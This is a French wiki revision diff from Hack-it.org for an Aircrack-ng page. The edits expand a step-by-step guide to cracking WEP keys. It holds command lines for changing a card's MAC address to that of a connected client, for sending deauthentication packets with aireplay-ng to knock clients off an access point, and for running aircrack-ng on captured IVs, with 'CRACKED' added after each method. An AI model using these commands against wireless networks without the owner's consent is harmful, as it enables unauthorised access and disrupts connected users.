Aircrack-ng

Version du 20 décembre 2008 à 19:44 (voir la source)

Mattoufoutu (discuter | contributions)

(→Mac spoofing)

← Modification précédente

Version du 20 décembre 2008 à 19:57 (voir la source)

Mattoufoutu (discuter | contributions)

Modification suivante →

Ligne 104 :

Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:

>>> ifconfig $iface down

-

>>>macchanger --mac $~~mac~~ $iface

+

>>>macchanger --mac $mac_client $iface

=== Méthode "ARP replay" ===

-

'''Méthode avec client ~~(en cas de~~ filtrage MAC~~, spoofer l'adresse MAC du client comme expliqué plus haut)~~'''

+

'''Méthode avec client et sans filtrage MAC'''

* Mettre carte en monitor:

>>> ifconfig $iface down

Ligne 134 :

* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:

>>> aircrack-ng $fichier_capture

+

''CRACKED !!!''

=== Methode "chop-chop" et "par fragmentation" ===

Ligne 160 :

Ligne 161 :

-o = nombre de jeux de paquets à envoyer à la fois

-q = intervale entre 2 paquets "keep-alive"

+

** En cas de filtrage MAC:

+

>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface

+

-0 = déauthentification

+

1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)

+

-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP

+

''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''

* Attaque:

Ligne 185 :

Ligne 192 :

* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:

>>> aircrack-ng $fichier_capture

+

''CRACKED''

=== Méthode "-p 0841" ===

Ligne 211 :

Ligne 219 :

-o = nombre de jeux de paquets à envoyer à la fois

-q = intervale entre 2 paquets "keep-alive"

+

** En cas de filtrage MAC:

+

>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface

+

-0 = déauthentification

+

1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)

+

-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP

+

''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''

* Lancer l'injection:

Ligne 220 :

Ligne 234 :

* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:

>>> aircrack-ng $fichier_capture

+

''CRACKED''

@@ Ligne 104 : / Ligne 104 : @@
 Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:
 <br />>>> ifconfig $iface down
-<br />>>>macchanger --mac $mac $iface
+<br />>>>macchanger --mac $mac_client $iface
 === Méthode "ARP replay" ===
-'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''
+'''Méthode avec client et sans filtrage MAC'''
 * Mettre carte en monitor:
 >>> ifconfig $iface down
@@ Ligne 134 : / Ligne 134 : @@
 * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
 >>> aircrack-ng $fichier_capture
+<br />''CRACKED !!!''
 === Methode "chop-chop" et "par fragmentation" ===
@@ Ligne 160 : / Ligne 161 : @@
 <br />-o = nombre de jeux de paquets à envoyer à la fois
 <br />-q = intervale entre 2 paquets "keep-alive"
+** En cas de filtrage MAC:
+>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
+<br />-0 = déauthentification
+<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
+<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
+<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
 * Attaque:
@@ Ligne 185 : / Ligne 192 : @@
 * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
 >>> aircrack-ng $fichier_capture
+<br />''CRACKED''
 === Méthode "-p 0841" ===
@@ Ligne 211 : / Ligne 219 : @@
 <br />-o = nombre de jeux de paquets à envoyer à la fois
 <br />-q = intervale entre 2 paquets "keep-alive"
+** En cas de filtrage MAC:
+>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
+<br />-0 = déauthentification
+<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
+<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
+<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
 * Lancer l'injection:
@@ Ligne 220 : / Ligne 234 : @@
 * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
 >>> aircrack-ng $fichier_capture
+<br />''CRACKED''

Aircrack-ng

De Hack-it.org.

Version du 20 décembre 2008 à 19:57